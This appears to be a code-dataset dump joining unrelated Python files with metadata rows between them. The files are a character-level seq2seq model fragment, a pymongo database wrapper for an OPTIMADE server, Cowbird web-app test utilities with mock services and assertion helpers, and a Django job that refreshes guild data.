self.decoder: Union[Decoder, VanillaDecoder] = VanillaDecoder(
char_vocabulary_size=tgt_vocab_size,
dim=dim,
layers=layers,
ff_dim=ff_dim,
attention_heads=attention_heads,
dropout=dropout,
encoder=self.encoder if ( # type: ignore
share_char_repr and vanilla_encoder) else None)
else:
self.decoder = Decoder(
char_vocabulary_size=tgt_vocab_size,
char_embedding_dim=char_embedding_dim,
conv_filters=conv_filters,
nar_output=nar_output,
dim=dim,
shrink_factor=shrink_factor,
highway_layers=highway_layers,
char_ff_layers=char_ff_layers,
layers=layers,
ff_dim=ff_dim,
attention_heads=attention_heads,
char_process_type=char_process_type,
dropout=dropout,
encoder=self.encoder if # type: ignore
share_char_repr else None)
def forward(
self, src_batch: T, src_mask: T, tgt_batch: T, tgt_mask: T,
loss_function: nn.Module,
log_details: bool = False) -> Tuple[T, T]:
encoded, enc_mask, enc_attention = self.encoder(src_batch, src_mask)
loss, details = self.decoder(
encoded, enc_mask, tgt_batch, tgt_mask, loss_function,
log_details=log_details)
if log_details:
details["enc_attentions"] = enc_attention
details["enc_attention_entropies"] = [
compute_attention_entropy(att, enc_mask)
for att in enc_attention]
shrinked_mask = details["decoder_mask"]
details["dec_attention_entropies"] = [
compute_attention_entropy(att, shrinked_mask)
for att in details["decoder_self_attention"]]
details["encdec_attention_entropies"] = [
compute_attention_entropy(att, shrinked_mask)
for att in details["decoder_self_attention"]]
return loss, details
@torch.no_grad()
def greedy_decode(
self, src_batch: T, input_mask: T,
eos_token_id: int, max_len: int = 400) -> Tuple[T, T]:
encoder_states, encoded_mask, _ = self.encoder(src_batch, input_mask)
decoded, mask = self.decoder.greedy_decode(
encoder_states, encoded_mask, eos_token_id, max_len=max_len)
return decoded, mask
@torch.no_grad()
def sample(
self, src_batch: T, input_mask: T,
n_samples: int,
eos_token_id: int, max_len: int = 400) -> List[Tuple[T, T]]:
encoder_states, encoded_mask, _ = self.encoder(src_batch, input_mask)
return [
self.decoder.greedy_decode(
encoder_states, encoded_mask, eos_token_id,
max_len=max_len,
sample=True)
for _ in range(n_samples)]
@torch.no_grad()
def beam_search(
self, src_batch: T, input_mask: T,
eos_token_id: int,
beam_size: int = 5,
len_norm: float = 0.5,
max_len: int = 400) -> Tuple[T, T]:
encoder_states, encoded_mask, _ = self.encoder(src_batch, input_mask)
decoded, mask = self.decoder.beam_search(
encoder_states, encoded_mask, eos_token_id,
beam_size=beam_size, len_norm=len_norm, max_len=max_len)
return decoded, mask
@property
def char_level_param_count(self) -> int:
"""Number of parameters in character processing layers."""
relevant_parts = []
if hasattr(self.encoder, "embeddings"):
relevant_parts = [self.encoder.embeddings]
if isinstance(self.encoder, Encoder):
relevant_parts.append(self.encoder.char_encoder)
if isinstance(self.decoder, VanillaDecoder):
relevant_parts.append(self.decoder.transformer.embeddings)
else:
relevant_parts.extend([
self.decoder.nar_proj, self.decoder.output_proj])
if not self.decoder.nar_output:
relevant_parts.append(self.decoder.char_decoder_rnn)
            if self.decoder.char_embeddings not in relevant_parts:
relevant_parts.extend([
self.decoder.char_embeddings, self.decoder.char_encoder])
char_parameters = {
p for part in relevant_parts for p in part.parameters()}
return sum(p.numel() for p in char_parameters)
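# Illustrative usage sketch (not part of the original file): constructing the
# model and decoding greedily. Vocabulary sizes, conv filters and token ids
# below are placeholders.
#   model = Seq2SeqModel(vocab_size=(300, 300), conv_filters=[3, 5, 7])
#   out_ids, out_mask = model.greedy_decode(src_ids, src_mask, eos_token_id=2)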
| 37.18408
| 77
| 0.596602
| 6,617
| 0.885336
| 0
| 0
| 2,434
| 0.325662
| 0
| 0
| 489
| 0.065427
|
8bbe4c37ae3a9b71342799d82ae3b600239ac59b
| 2,638
|
py
|
Python
|
src/backends/example_mongodb/database.py
|
rartino/python-optimade-server
|
84457091c7ec0db52a7e034bb6a7cd4bcbdd4e57
|
[
"MIT"
] | null | null | null |
src/backends/example_mongodb/database.py
|
rartino/python-optimade-server
|
84457091c7ec0db52a7e034bb6a7cd4bcbdd4e57
|
[
"MIT"
] | null | null | null |
src/backends/example_mongodb/database.py
|
rartino/python-optimade-server
|
84457091c7ec0db52a7e034bb6a7cd4bcbdd4e57
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
#
# Copyright 2019 Rickard Armiento
#
# This file is part of a Python candidate reference implementation of
# the optimade API [https://www.optimade.org/]
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import pymongo
import threading
class Database(object):
def __init__(self):
self.client = pymongo.MongoClient()
self.db = self.client.optimade_test
def empty_database(self):
self.client.drop_database("optimade_test")
self.db = self.client.optimade_test
def collection_destroy_if_exists(self, coll):
        self.db[coll].delete_many({})
if coll in self.db.list_collection_names():
self.db[coll].drop()
def insert(self, coll, data):
self.db[coll].insert_one(data)
def insert_many(self, coll, datas):
try:
            self.db[coll].insert_many(datas)
except pymongo.errors.BulkWriteError as e:
print(e.details)
raise
    def find(self, coll, query, projection=None, limit=None):
        if projection:
            cursor = self.db[coll].find(query, {x: 1 for x in projection})
        else:
            cursor = self.db[coll].find(query)
        if limit is not None:
            cursor = cursor.limit(limit)
        return cursor
def find_one(self, coll, query):
return self.db[coll].find_one(query)
def close(self):
self.client.close()
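# Hedged usage sketch (editor addition): exercises the wrapper against a local
# MongoDB instance on the default port; the collection name and documents are
# illustrative only.
if __name__ == "__main__":
    db = Database()
    db.collection_destroy_if_exists("structures")
    db.insert("structures", {"id": "ex-1", "nelements": 2})
    db.insert_many("structures", [{"id": "ex-2"}, {"id": "ex-3"}])
    print(db.find_one("structures", {"id": "ex-1"}))
    for doc in db.find("structures", {}, projection=["id"], limit=2):
        print(doc)
    db.close()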
| 35.173333
| 97
| 0.674375
| 1,362
| 0.5163
| 0
| 0
| 0
| 0
| 0
| 0
| 1,228
| 0.465504
|
8bbe4fd060a6878adde13a88356535b7bfb0e331
| 29,288
|
py
|
Python
|
tests/utils.py
|
Ouranosinc/cowbird
|
108195ca6abbd58fd75b180f6fa7d40eab0f8ea5
|
[
"MIT"
] | 1
|
2021-02-04T18:56:36.000Z
|
2021-02-04T18:56:36.000Z
|
tests/utils.py
|
Ouranosinc/cowbird
|
108195ca6abbd58fd75b180f6fa7d40eab0f8ea5
|
[
"MIT"
] | 12
|
2021-02-05T22:01:10.000Z
|
2022-03-09T14:23:10.000Z
|
tests/utils.py
|
Ouranosinc/cowbird
|
108195ca6abbd58fd75b180f6fa7d40eab0f8ea5
|
[
"MIT"
] | null | null | null |
import functools
import json as json_pkg # avoid conflict name with json argument employed for some function
import os
from distutils.version import LooseVersion
from typing import TYPE_CHECKING
from urllib.parse import urlparse
import mock
import requests
import requests.exceptions
from pyramid.httpexceptions import HTTPException
from pyramid.testing import DummyRequest
from pyramid.testing import setUp as PyramidSetUp
from webtest.app import AppError, TestApp # noqa
from webtest.response import TestResponse
from cowbird.app import get_app
from cowbird.constants import COWBIRD_ROOT, get_constant
from cowbird.services.service import Service
from cowbird.utils import (
CONTENT_TYPE_JSON,
USE_TEST_CELERY_APP_CFG,
SingletonMeta,
get_header,
get_settings_from_config_ini,
is_null,
null
)
# employ example INI config for tests where needed to ensure that configurations are valid
TEST_INI_FILE = os.path.join(COWBIRD_ROOT, "config/cowbird.example.ini")
TEST_CFG_FILE = os.path.join(COWBIRD_ROOT, "config/config.example.yml")
class TestAppContainer(object):
test_app = None # type: Optional[TestApp]
app = None # type: Optional[TestApp]
url = None # type: Optional[str]
if TYPE_CHECKING:
# pylint: disable=W0611,unused-import
from typing import Any, Callable, Collection, Dict, Iterable, List, Optional, Type, Union
from pyramid.request import Request
from cowbird.typedefs import (
JSON,
AnyCookiesType,
AnyHeadersType,
AnyResponseType,
CookiesType,
HeadersType,
SettingsType
)
from cowbird.utils import NullType
# pylint: disable=C0103,invalid-name
TestAppOrUrlType = Union[str, TestApp]
AnyTestItemType = Union[TestAppOrUrlType, TestAppContainer]
class TestVersion(LooseVersion):
"""
Special version supporting ``latest`` keyword to ignore safeguard check of :func:`warn_version` during development.
.. seealso::
Environment variable ``COWBIRD_TEST_VERSION`` should be set with the desired version or ``latest`` to evaluate
even new features above the last tagged version.
"""
__test__ = False # avoid invalid collect depending on specified input path/items to pytest
def __init__(self, vstring):
if isinstance(vstring, (TestVersion, LooseVersion)):
self.version = vstring.version
return
if vstring == "latest":
self.version = vstring # noqa
return
super(TestVersion, self).__init__(vstring)
def _cmp(self, other):
if not isinstance(other, TestVersion):
other = TestVersion(other)
if self.version == "latest" and other.version == "latest":
return 0
if self.version == "latest":
return 1
if other.version == "latest":
return -1
return super(TestVersion, self)._cmp(other)
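# Hedged illustration (editor addition) of the "latest" keyword handled by
# `_cmp` above; the expressions below evaluate as indicated:
#     TestVersion("latest") > TestVersion("99.0")     -> True
#     TestVersion("latest") == TestVersion("latest")  -> True
#     TestVersion("1.2.3") < TestVersion("latest")    -> True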
class MockMagpieService(Service):
required_params = []
def __init__(self, settings, name, **kwargs):
super(MockMagpieService, self).__init__(settings, name, **kwargs)
self.event_users = []
self.event_perms = []
self.outbound_perms = []
def json(self):
return {"name": self.name,
"event_users": self.event_users,
"event_perms": self.event_perms,
"outbound_perms": self.outbound_perms}
def get_resource_id(self, resource_full_name):
pass
def user_created(self, user_name):
self.event_users.append(user_name)
def user_deleted(self, user_name):
self.event_users.remove(user_name)
def permission_created(self, permission):
self.event_perms.append(permission.resource_full_name)
def permission_deleted(self, permission):
self.event_perms.remove(permission.resource_full_name)
def create_permission(self, permission):
self.outbound_perms.append(permission)
def delete_permission(self, permission):
for perm in self.outbound_perms:
if perm == permission:
self.outbound_perms.remove(perm)
return
class MockAnyServiceBase(Service):
ResourceId = 1000
def get_resource_id(self, resource_full_name):
        # type: (str) -> int
return MockAnyService.ResourceId
def user_created(self, user_name):
pass
def user_deleted(self, user_name):
pass
def permission_created(self, permission):
pass
def permission_deleted(self, permission):
pass
class MockAnyService(MockAnyServiceBase):
required_params = []
def clear_services_instances():
# Remove the service instances initialized with test specific config
SingletonMeta._instances.clear() # pylint: disable=W0212
def config_setup_from_ini(config_ini_file_path):
settings = get_settings_from_config_ini(config_ini_file_path)
config = PyramidSetUp(settings=settings)
return config
def get_test_app(settings=None):
# type: (Optional[SettingsType]) -> TestApp
"""
Instantiate a local test application.
"""
config = config_setup_from_ini(TEST_INI_FILE)
config.registry.settings["cowbird.url"] = "http://localhost:80"
config.registry.settings["cowbird.ini_file_path"] = TEST_INI_FILE
config.registry.settings["cowbird.config_path"] = TEST_CFG_FILE
config.registry.settings["mongo_uri"] = "mongodb://{host}:{port}/{db_name}".format(
host=os.getenv("COWBIRD_TEST_DB_HOST", "127.0.0.1"),
port=os.getenv("COWBIRD_TEST_DB_PORT", "27017"),
db_name=os.getenv("COWBIRD_TEST_DB_NAME", "cowbird-test")
)
# For test, we want to use the real Celery app which is properly mocked
# By setting the internal setting USE_TEST_CELERY_APP_CFG to true, the pyramid celery app will not be used
config.registry.settings[USE_TEST_CELERY_APP_CFG] = True
if settings:
config.registry.settings.update(settings)
test_app = TestApp(get_app({}, **config.registry.settings))
return test_app
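# Hedged usage sketch (editor addition): a test case could build the application
# once per class; the settings override shown is illustrative only.
#     class ExampleTestCase(unittest.TestCase):
#         @classmethod
#         def setUpClass(cls):
#             cls.test_app = get_test_app(settings={"cowbird.log_level": "DEBUG"})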
def get_app_or_url(test_item):
# type: (AnyTestItemType) -> TestAppOrUrlType
"""
    Obtains the referenced test application, local application or remote URL from the `Test Case` implementation.
"""
if isinstance(test_item, (TestApp, str)):
return test_item
test_app = getattr(test_item, "test_app", None)
if test_app and isinstance(test_app, TestApp):
return test_app
app_or_url = getattr(test_item, "app", None) or getattr(test_item, "url", None)
if not app_or_url:
raise ValueError("Invalid test class, application or URL could not be found.")
return app_or_url
def get_hostname(test_item):
# type: (AnyTestItemType) -> str
"""
    Obtains the hostname stored in the class implementation.
"""
app_or_url = get_app_or_url(test_item)
if isinstance(app_or_url, TestApp):
app_or_url = get_constant("COWBIRD_URL", app_or_url.app.registry)
return urlparse(app_or_url).hostname
def get_headers(app_or_url, header_dict):
# type: (TestAppOrUrlType, AnyHeadersType) -> HeadersType
"""
    Obtains the headers stored in the class implementation.
"""
if isinstance(app_or_url, TestApp):
return dict(header_dict.items()) # noqa
return header_dict
def get_response_content_types_list(response):
# type: (AnyResponseType) -> List[str]
"""
Obtains the specified response Content-Type header(s) without additional formatting parameters.
"""
content_types = []
known_types = ["application", "audio", "font", "example", "image", "message", "model", "multipart", "text", "video"]
for part in response.headers["Content-Type"].split(";"):
for sub_type in part.strip().split(","):
if "=" not in sub_type and sub_type.split("/")[0] in known_types:
content_types.append(sub_type)
return content_types
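# Hedged illustration (editor addition): for a response header such as
#     Content-Type: application/json; charset=UTF-8
# the helper above drops the "charset" parameter and returns ["application/json"].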
def get_json_body(response):
# type: (AnyResponseType) -> JSON
"""
Obtains the JSON payload of the response regardless of its class implementation.
"""
if isinstance(response, TestResponse):
return response.json
return response.json()
def json_msg(json_body, msg=null):
# type: (JSON, Optional[str]) -> str
"""
Generates a message string with formatted JSON body for display with easier readability.
"""
json_str = json_pkg.dumps(json_body, indent=4, ensure_ascii=False)
if msg is not null:
return "{}\n{}".format(msg, json_str)
return json_str
def mock_get_settings(test):
"""
Decorator to mock :func:`cowbird.utils.get_settings` to allow retrieval of settings from :class:`DummyRequest`.
.. warning::
        Only apply to test methods (not to the TestCase class) to ensure that :mod:`pytest` can collect them correctly.
"""
from cowbird.utils import get_settings as real_get_settings
def mocked(container):
if isinstance(container, DummyRequest):
return container.registry.settings
return real_get_settings(container)
@functools.wraps(test)
def wrapped(*_, **__):
# mock.patch("cowbird.services.get_settings", side_effect=mocked)
with mock.patch("cowbird.utils.get_settings", side_effect=mocked):
return test(*_, **__)
return wrapped
def mock_request(request_path_query="", # type: str
method="GET", # type: str
params=None, # type: Optional[Dict[str, str]]
body="", # type: Union[str, JSON]
content_type=None, # type: Optional[str]
headers=None, # type: Optional[AnyHeadersType]
cookies=None, # type: Optional[AnyCookiesType]
settings=None, # type: SettingsType
): # type: (...) -> Request
"""
Generates a fake request with provided arguments.
    Can be employed by functions that expect a request object as input to retrieve details such as body content, the
    request path, or internal settings, when no actual request needs to be accomplished.
"""
parts = request_path_query.split("?")
path = parts[0]
query = dict()
if len(parts) > 1 and parts[1]:
for part in parts[1].split("&"):
kv = part.split("=") # handle trailing keyword query arguments without values
            if kv[0]:  # skip entries with an empty keyword name
query[kv[0]] = kv[1] if len(kv) > 1 else None
elif params:
query = params
request = DummyRequest(path=path, params=query)
request.path_qs = request_path_query
request.method = method
request.content_type = content_type
request.headers = headers or {}
request.cookies = cookies or {}
request.matched_route = None # cornice method
if content_type:
request.headers["Content-Type"] = content_type
request.body = body
try:
if body:
# set missing DummyRequest.json attribute
request.json = json_pkg.loads(body) # type: ignore
except (TypeError, ValueError):
pass
request.registry.settings = settings or {}
    return request  # noqa  # fake request standing in for the expected type, avoids many 'noqa' markers elsewhere
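# Hedged usage sketch (editor addition): building a fake POST request to feed a
# view function directly; the path and payload are illustrative only.
#     req = mock_request("/services?detail=true", method="POST",
#                        body='{"name": "thredds"}', content_type=CONTENT_TYPE_JSON)
#     assert req.json["name"] == "thredds"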
def test_request(test_item, # type: AnyTestItemType
method, # type: str
path, # type: str
data=None, # type: Optional[Union[JSON, str]]
json=None, # type: Optional[Union[JSON, str]]
body=None, # type: Optional[Union[JSON, str]]
params=None, # type: Optional[Dict[str, str]]
timeout=10, # type: int
retries=3, # type: int
allow_redirects=True, # type: bool
content_type=None, # type: Optional[str]
headers=None, # type: Optional[HeadersType]
cookies=None, # type: Optional[CookiesType]
**kwargs # type: Any
): # type: (...) -> AnyResponseType
"""
Calls the request using either a :class:`webtest.TestApp` instance or :class:`requests.Request` from a string URL.
Keyword arguments :paramref:`json`, :paramref:`data` and :paramref:`body` are all looked for to obtain the data.
Header ``Content-Type`` is set with respect to explicit :paramref:`json` or via provided :paramref:`headers` when
available. Explicit :paramref:`content_type` can also be provided to override all of these.
Request cookies are set according to :paramref:`cookies`, or can be interpreted from ``Set-Cookie`` header.
.. warning::
        When using :class:`TestApp`, some internal cookies can be stored from previous requests to retain the active
        user. Make sure to provide a new set of cookies (or logout the user explicitly) if a different session must be
        used, otherwise they will be picked up automatically. For 'empty' cookies, provide an empty dictionary.
:param test_item: one of `BaseTestCase`, `webtest.TestApp` or remote server URL to call with `requests`
:param method: request method (GET, POST, PATCH, PUT, DELETE)
:param path: test path starting at base path that will be appended to the application's endpoint.
:param params: query parameters added to the request path.
:param json: explicit JSON body content to use as request body.
:param data: body content string to use as request body, can be JSON if matching ``Content-Type`` is identified.
:param body: alias to :paramref:`data`.
:param content_type:
Enforce specific content-type of provided data body. Otherwise, attempt to retrieve it from request headers.
Inferred JSON content-type when :paramref:`json` is employed, unless overridden explicitly.
:param headers: Set of headers to send the request. Header ``Content-Type`` is looked for if not overridden.
:param cookies: Cookies to provide to the request.
:param timeout: passed down to :mod:`requests` when using URL, otherwise ignored (unsupported).
:param retries: number of retry attempts in case the requested failed due to timeout (only when using URL).
:param allow_redirects:
        Passed down to :mod:`requests` when using URL, handled manually for the same behaviour when using :class:`TestApp`.
:param kwargs: any additional keywords that will be forwarded to the request call.
:return: response of the request
"""
method = method.upper()
status = kwargs.pop("status", None)
# obtain json body from any json/data/body kw and empty {} if not specified
# reapply with the expected webtest/requests method kw afterward
_body = json or data or body or {}
app_or_url = get_app_or_url(test_item)
if isinstance(app_or_url, TestApp):
# set 'cookies' handled by the 'TestApp' instance if not present or different
if cookies is not None:
cookies = dict(cookies) # convert tuple-list as needed
if not app_or_url.cookies or app_or_url.cookies != cookies:
app_or_url.cookies.update(cookies)
# obtain Content-Type header if specified to ensure it is properly applied
kwargs["content_type"] = content_type if content_type else get_header("Content-Type", headers)
# update path with query parameters since TestApp does not have an explicit argument when not using GET
if params:
path += "?" + "&".join("{!s}={!s}".format(k, v) for k, v in params.items() if v is not None)
kwargs.update({
"params": _body, # TestApp uses 'params' for the body during POST (these are not the query parameters)
"headers": dict(headers or {}), # adjust if none provided or specified as tuple list
})
# convert JSON body as required
if _body is not None and (json is not None or kwargs["content_type"] == CONTENT_TYPE_JSON):
kwargs["params"] = json_pkg.dumps(_body, cls=json_pkg.JSONEncoder)
kwargs["content_type"] = CONTENT_TYPE_JSON # enforce if only 'json' keyword provided
kwargs["headers"]["Content-Length"] = str(len(kwargs["params"])) # need to fix with override JSON payload
if status and status >= 300:
kwargs["expect_errors"] = True
err_code = None
err_msg = None
try:
resp = app_or_url._gen_request(method, path, **kwargs) # pylint: disable=W0212 # noqa: W0212
except AppError as exc:
err_code = exc
err_msg = str(exc)
except HTTPException as exc:
err_code = exc.status_code
err_msg = str(exc) + str(getattr(exc, "exception", ""))
except Exception as exc:
err_code = 500
err_msg = "Unknown: {!s}".format(exc)
finally:
if err_code:
info = json_msg({"path": path, "method": method, "body": _body, "headers": kwargs["headers"]})
result = "Request raised unexpected error: {!s}\nError: {}\nRequest:\n{}"
raise AssertionError(result.format(err_code, err_msg, info))
# automatically follow the redirect if any and evaluate its response
max_redirect = kwargs.get("max_redirects", 5)
while 300 <= resp.status_code < 400 and max_redirect > 0: # noqa
resp = resp.follow()
max_redirect -= 1
assert max_redirect >= 0, "Maximum follow redirects reached."
# test status accordingly if specified
assert resp.status_code == status or status is None, "Response not matching the expected status code."
return resp
kwargs.pop("expect_errors", None) # remove keyword specific to TestApp
content_type = get_header("Content-Type", headers)
if json or content_type == CONTENT_TYPE_JSON:
kwargs["json"] = _body
elif data or body:
kwargs["data"] = _body
url = "{url}{path}".format(url=app_or_url, path=path)
while True:
try:
return requests.request(method, url, params=params, headers=headers, cookies=cookies,
timeout=timeout, allow_redirects=allow_redirects, **kwargs)
except requests.exceptions.ReadTimeout:
if retries <= 0:
raise
retries -= 1
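# Hedged usage sketch (editor addition): the same call works transparently with
# a local TestApp or a remote URL test item; the endpoint and payload are
# illustrative only.
#     resp = test_request(test_item, "POST", "/services", json={"name": "example"})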
def visual_repr(item):
# type: (Any) -> str
try:
if isinstance(item, (dict, list)):
return json_pkg.dumps(item, indent=4, ensure_ascii=False)
except Exception: # noqa
pass
return "'{}'".format(repr(item))
def format_test_val_ref(val, ref, pre="Fail", msg=None):
if is_null(msg):
_msg = "({}) Failed condition between test and reference values.".format(pre)
else:
_msg = "({}) Test value: {}, Reference value: {}".format(pre, visual_repr(val), visual_repr(ref))
if isinstance(msg, str):
_msg = "{}\n{}".format(msg, _msg)
return _msg
def all_equal(iter_val, iter_ref, any_order=False):
if not (hasattr(iter_val, "__iter__") and hasattr(iter_ref, "__iter__")):
return False
if len(iter_val) != len(iter_ref):
return False
if any_order:
return all(it in iter_ref for it in iter_val)
return all(it == ir for it, ir in zip(iter_val, iter_ref))
def check_all_equal(iter_val, iter_ref, msg=None, any_order=False):
# type: (Collection[Any], Union[Collection[Any], NullType], Optional[str], bool) -> None
"""
:param iter_val: tested values.
:param iter_ref: reference values.
:param msg: override message to display if failing test.
:param any_order: allow equal values to be provided in any order, otherwise order must match as well as values.
:raises AssertionError:
If all values in :paramref:`iter_val` are not equal to values within :paramref:`iter_ref`.
If :paramref:`any_order` is ``False``, also raises if equal items are not in the same order.
"""
r_val = repr(iter_val)
r_ref = repr(iter_ref)
assert all_equal(iter_val, iter_ref, any_order), format_test_val_ref(r_val, r_ref, pre="All Equal Fail", msg=msg)
def check_val_equal(val, ref, msg=None):
# type: (Any, Union[Any, NullType], Optional[str]) -> None
""":raises AssertionError: if :paramref:`val` is not equal to :paramref:`ref`."""
assert is_null(ref) or val == ref, format_test_val_ref(val, ref, pre="Equal Fail", msg=msg)
def check_val_not_equal(val, ref, msg=None):
# type: (Any, Union[Any, NullType], Optional[str]) -> None
""":raises AssertionError: if :paramref:`val` is equal to :paramref:`ref`."""
assert is_null(ref) or val != ref, format_test_val_ref(val, ref, pre="Not Equal Fail", msg=msg)
def check_val_is_in(val, ref, msg=None):
# type: (Any, Union[Any, NullType], Optional[str]) -> None
""":raises AssertionError: if :paramref:`val` is not in to :paramref:`ref`."""
assert is_null(ref) or val in ref, format_test_val_ref(val, ref, pre="Is In Fail", msg=msg)
def check_val_not_in(val, ref, msg=None):
# type: (Any, Union[Any, NullType], Optional[str]) -> None
""":raises AssertionError: if :paramref:`val` is in to :paramref:`ref`."""
assert is_null(ref) or val not in ref, format_test_val_ref(val, ref, pre="Not In Fail", msg=msg)
def check_val_type(val, ref, msg=None):
# type: (Any, Union[Type[Any], NullType, Iterable[Type[Any]]], Optional[str]) -> None
""":raises AssertionError: if :paramref:`val` is not an instanced of :paramref:`ref`."""
assert isinstance(val, ref), format_test_val_ref(val, repr(ref), pre="Type Fail", msg=msg)
def check_raises(func, exception_type, msg=None):
# type: (Callable[[], Any], Type[Exception], Optional[str]) -> Exception
"""
Calls the callable and verifies that the specific exception was raised.
:raise AssertionError: on failing exception check or missing raised exception.
:returns: raised exception of expected type if it was raised.
"""
msg = ": {}".format(msg) if msg else "."
try:
func()
except Exception as exc: # pylint: disable=W0703
msg = "Wrong exception [{!s}] raised instead of [{!s}]{}" \
.format(type(exc).__name__, exception_type.__name__, msg)
assert isinstance(exc, exception_type), msg
return exc
raise AssertionError("Exception [{!s}] was not raised{}".format(exception_type.__name__, msg))
def check_no_raise(func, msg=None):
# type: (Callable[[], Any], Optional[str]) -> Any
"""
Calls the callable and verifies that no exception was raised.
:raise AssertionError: on any raised exception.
"""
try:
return func()
except Exception as exc: # pylint: disable=W0703
msg = ": {}".format(msg) if msg else "."
raise AssertionError("Exception [{!r}] was raised when none is expected{}".format(type(exc).__name__, msg))
def check_response_basic_info(response, # type: AnyResponseType
expected_code=200, # type: int
expected_type=CONTENT_TYPE_JSON, # type: str
expected_method="GET", # type: str
extra_message=None, # type: Optional[str]
): # type: (...) -> Union[JSON, str]
"""
Validates basic `Cowbird` API response metadata. For UI pages, employ :func:`check_ui_response_basic_info` instead.
If the expected content-type is JSON, further validations are accomplished with specific metadata fields that are
always expected in the response body. Otherwise, minimal validation of basic fields that can be validated regardless
of content-type is done.
:param response: response to validate.
:param expected_code: status code to validate from the response.
:param expected_type: Content-Type to validate from the response.
:param expected_method: method 'GET', 'POST', etc. to validate from the response if an error.
:param extra_message: additional message to append to every specific test message if provided.
:return: json body of the response for convenience.
"""
def _(_msg):
return _msg + " " + extra_message if extra_message else _msg
check_val_is_in("Content-Type", dict(response.headers), msg=_("Response doesn't define 'Content-Type' header."))
content_types = get_response_content_types_list(response)
check_val_is_in(expected_type, content_types, msg=_("Response doesn't match expected HTTP Content-Type header."))
code_message = "Response doesn't match expected HTTP status code."
if expected_type == CONTENT_TYPE_JSON:
        # provide more details about the mismatching code to help debug the cause of the error
code_message += "\nReason:\n{}".format(json_msg(get_json_body(response)))
check_val_equal(response.status_code, expected_code, msg=_(code_message))
if expected_type == CONTENT_TYPE_JSON:
body = get_json_body(response)
check_val_is_in("code", body, msg=_("Parameter 'code' should be in response JSON body."))
check_val_is_in("type", body, msg=_("Parameter 'type' should be in response JSON body."))
check_val_is_in("detail", body, msg=_("Parameter 'detail' should be in response JSON body."))
check_val_equal(body["code"], expected_code, msg=_("Parameter 'code' should match HTTP status code."))
check_val_equal(body["type"], expected_type, msg=_("Parameter 'type' should match HTTP Content-Type header."))
check_val_not_equal(body["detail"], "", msg=_("Parameter 'detail' should not be empty."))
else:
body = response.text
if response.status_code >= 400:
# error details available for any content-type, just in different format
check_val_is_in("url", body, msg=_("Request URL missing from contents,"))
check_val_is_in("path", body, msg=_("Request path missing from contents."))
check_val_is_in("method", body, msg=_("Request method missing from contents."))
if expected_type == CONTENT_TYPE_JSON: # explicitly check by dict-key if JSON
check_val_equal(body["method"], expected_method, msg=_("Request method not matching expected value."))
return body
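# Hedged usage sketch (editor addition): combining the request and validation
# helpers; the endpoint and expected code are illustrative only.
#     resp = test_request(test_item, "GET", "/version")
#     body = check_response_basic_info(resp, expected_code=200)
#     check_val_is_in("version", body)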
def check_error_param_structure(body, # type: JSON
param_value=null, # type: Optional[Any]
param_name=null, # type: Optional[str]
param_compare=null, # type: Optional[Any]
is_param_value_literal_unicode=False, # type: bool
param_name_exists=False, # type: bool
param_compare_exists=False, # type: bool
): # type: (...) -> None
"""
Validates error response ``param`` information based on different Cowbird version formats.
:param body: JSON body of the response to validate.
    :param param_value:
        Expected 'value' of the parameter.
        Contained field value not verified if ``null``, only presence of the field.
    :param param_name:
        Expected 'name' of the parameter. Ignored for older Cowbird versions that did not provide this information.
        Contained field value not verified if ``null`` and ``param_name_exists`` is ``True`` (only its presence).
        If provided, automatically implies ``param_name_exists=True``. Skipped otherwise.
    :param param_compare:
        Expected 'compare'/'param_compare' value (field name according to version).
        Contained field value not verified if ``null`` and ``param_compare_exists`` is ``True`` (only its presence).
        If provided, automatically implies ``param_compare_exists=True``. Skipped otherwise.
    :param is_param_value_literal_unicode: param value is represented as `u'{paramValue}'` for older Cowbird versions.
:param param_name_exists: verify that 'name' is in the body, not validating its value.
:param param_compare_exists: verify that 'compare'/'param_compare' is in the body, not validating its value.
:raises AssertionError: on any failing condition
"""
check_val_type(body, dict)
check_val_is_in("param", body)
check_val_type(body["param"], dict)
check_val_is_in("value", body["param"])
if param_name_exists or param_name is not null:
check_val_is_in("name", body["param"])
if param_name is not null:
check_val_equal(body["param"]["name"], param_name)
if param_value is not null:
check_val_equal(body["param"]["value"], param_value)
if param_compare_exists or param_compare is not null:
check_val_is_in("compare", body["param"])
if param_compare is not null:
check_val_equal(body["param"]["compare"], param_compare)
| 44.042105
| 120
| 0.651974
| 2,992
| 0.102158
| 0
| 0
| 232
| 0.007921
| 0
| 0
| 13,281
| 0.453462
|
8bc1dc764cc3286fa9cb0c9dbac2a3360dc97788
| 764
|
py
|
Python
|
sqds/jobs/update_guilds.py
|
abey79/sqds
|
acab1d9c6d4a010fff9d8e89a5fdd9d94def7c89
|
[
"MIT"
] | null | null | null |
sqds/jobs/update_guilds.py
|
abey79/sqds
|
acab1d9c6d4a010fff9d8e89a5fdd9d94def7c89
|
[
"MIT"
] | null | null | null |
sqds/jobs/update_guilds.py
|
abey79/sqds
|
acab1d9c6d4a010fff9d8e89a5fdd9d94def7c89
|
[
"MIT"
] | null | null | null |
from django.utils import timezone
from django_extensions.management.jobs import BaseJob
from ..models import Player, Guild
def update_guild(ally_code):
should_execute = False
try:
player = Player.objects.get(ally_code=ally_code)
        guild = player.guild
since_last_update = timezone.now() - guild.last_updated
if since_last_update.total_seconds() >= 4 * 3600:
should_execute = True
except Player.DoesNotExist:
should_execute = True
if should_execute:
Guild.objects.update_or_create_from_swgoh(ally_code=ally_code)
class Job(BaseJob):
help = "Update PREPARE and PREPAIRED data from swgoh.help"
def execute(self):
update_guild(116235559)
update_guild(343174317)
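# Hedged note (editor addition): the staleness guard in `update_guild` refreshes
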